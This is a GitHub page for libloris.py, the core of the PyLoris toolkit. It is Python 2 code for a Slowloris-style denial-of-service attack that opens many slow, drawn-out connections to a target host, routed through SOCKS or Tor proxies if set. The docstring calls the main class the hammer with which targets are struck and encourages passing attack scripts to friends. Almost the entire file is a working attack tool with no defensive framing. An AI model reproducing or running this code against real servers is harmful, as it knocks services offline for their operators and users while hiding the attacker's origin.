-
Notifications
You must be signed in to change notification settings - Fork 5
/
libloris.py
executable file
·219 lines (186 loc) · 8.64 KB
/
libloris.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
#!/usr/bin/env python
"""
libloris.py
This is the main bulk of the PyLoris toolkit. This file contains:
def DefaultOptions
- The DefaultOptions function will populate a dict containing all the required
options for running a basic PyLoris attack.
class Loris
- The Loris class is the hammer with which targets are struck. After
instantiating this class, one must feed a dict containing connection options
through the .LoadOptions member function. After the options are loaded, calling
the .start member function will initiate the attack according to options
specified. While an attack is underway, one may check the .status for a tuple of
(# of total attacks started, # of attack threads, # of current open sockets).
From there, you should call .messages.get, errors.get, and debug.get occasionally
to gather additional information from PyLoris.
See class ScriptLoris for a basic usage of the Loris class.
class ScriptLoris
- This is a base class for building attack scripts for rapid use or distribution.
Simply instantiate a ScriptLoris object, the .options dict properties, and
call .mainloop. Once you are satisfied with the results, pass the script along
to your friends!
"""
# Base modules
import Queue
import socket
import thread
import threading
import time
# Some import trickery to get SSL working across Python 2.x versions.
try:
from ssl import wrap_socket
except:
wrap_socket = socket.ssl
# Local modules
import socks
def DefaultOptions():
return {
'host' : 'localhost', # Host to attack
'port' : 80, # Port to connect to
'ssl' : False, # Use SSL connections
'attacklimit' : 0, # Total number of times to attack (0 for unlimited)
'connectionlimit' : 0, # Total number of concurrent connections (0 for unlimited)
'threadlimit' : 1000, # Total number of threads (0 for unlimited)
'connectionspeed' : 1, # Connection speed in bytes/second
'timebetweenthreads' : 1, # Time delay between starting threads
'timebetweenconnections' : 1, # Time delay between starting connections
'quitimmediately' : False, # Close connections immediately after completing request
'socksversion' : 'SOCKS5', # Enable SOCKS proxy, set to SOCKS4, SOCKS5, or HTTP
'sockshost' : 'localhost', # SOCKS host
'socksport' : 9050, # SOCKS port
'socksuser' : '', # SOCKS username
'sockspass' : '', # SOCKS password
'request' : '', # The main body of the attack
}
class Loris(threading.Thread):
options = {}
running = False
attacks = 0
threads = 0
sockets = 0
def __init__(self):
threading.Thread.__init__(self)
self.connections = Queue.Queue()
self.errors = Queue.Queue()
self.messages = Queue.Queue()
self.debug = Queue.Queue()
self.options = DefaultOptions()
def LoadOptions(self, o):
self.options = o.copy()
def run(self):
self.messages.put('PyLoris is starting up.')
self.running = True
thread.start_new_thread(self.build_sockets, ())
for id in range(self.options['threadlimit']):
thread.start_new_thread(self.attack, (id,))
self.threads += 1
if self.options['timebetweenthreads'] > 0:
time.sleep(self.options['timebetweenthreads'])
def build_sockets(self):
self.debug.put('Socket Builder started.')
count = 0
while (self.options['attacklimit'] == 0 or self.options['attacklimit'] > self.attacks) and self.running:
if self.options['connectionlimit'] > self.sockets:
if self.options['socksversion'] == 'SOCKS4' or self.options['socksversion'] == 'SOCKS5' or self.options['socksversion'] == 'HTTP':
if self.options['socksversion'] == 'SOCKS4': proxytype = socks.PROXY_TYPE_SOCKS4
elif self.options['socksversion'] == 'SOCKS5': proxytype = socks.PROXY_TYPE_SOCKS5
else: proxytype = socks.PROXY_TYPE_HTTP
s = socks.socksocket()
if self.options['socksuser'] == '' and self.options['sockspass'] == '':
s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'], self.options['socksuser'], self.options['sockspass'])
else:
s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'])
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self.options['host'], self.options['port']))
if self.options['ssl'] == True:
wrap_socket(s)
self.connections.put((s, 0))
self.debug.put('Socket opened, connection created.')
self.attacks += 1
self.sockets += 1
except Exception, ex:
self.errors.put('Could not connect. %s.' % (ex))
if self.options['timebetweenconnections'] > 0:
time.sleep(self.options['timebetweenconnections'])
self.debug.put('Socket Builder finished.')
def attack(self, id):
self.debug.put('Attack thread %i started' % (id))
while self.running:
(s, index) = self.connections.get()
try:
if len(self.options['request']) > index:
s.send(self.options['request'][index])
index += 1
self.connections.put((s, index))
elif self.options['quitimmediately'] == False:
data = s.recv(1024)
if not len(data):
s.close()
self.debug.put('Socket closed, data tranfer finished.')
self.sockets -= 1
else:
self.connections.put((s, index))
else:
s.close()
self.debug.put('Socket closed, not waiting for response.')
self.sockets -= 1
except Exception, ex:
self.errors.put(ex)
self.debug.put('Socket closed, an exception occurred.')
s.close()
self.sockets -= 1
if self.sockets == 0 and self.attacks == self.options['attacklimit']:
self.debug.put('Attack limit reached, all sockets closed. Shutting down.')
self.running = False
elif self.sockets > 0 and self.options['connectionspeed'] > 0:
time.sleep(1 / self.options['connectionspeed'] / self.sockets * self.threads)
elif self.options['connectionspeed'] > 0:
time.sleep(1 / self.options['connectionspeed'] * self.threads)
self.debug.put('Attack thread %i finished.' % (id))
self.threads -= 1
def status(self):
return (self.attacks, self.threads, self.sockets)
def stop(self):
self.messages.put('PyLoris is shutting down.')
self.running = False
while not self.connections.empty():
try:
s = self.connections.get(True, 30)
s.close()
self.sockets -= 1
except:
pass
class ScriptLoris(Loris):
def __init__(self):
self.options = DefaultOptions()
Loris.__init__(self)
def mainloop(self):
self.start()
time.sleep(1)
while self.running:
status = self.status()
try:
while True:
message = self.messages.get(False)
print('[MESSAGE] %s' %(message))
except:
pass
try:
while True:
debug = self.debug.get(False)
print('[DEBUG] %s' %(debug))
except:
pass
try:
while True:
error = self.errors.get(False)
print('[ERROR] %s' %(error))
except:
pass
print 'Loris has started %i attacks, with %i threads and %i connections currently running.' % status
time.sleep(1)
status = self.status()
print 'Pyloris has completed %i attacks.' % (status[0])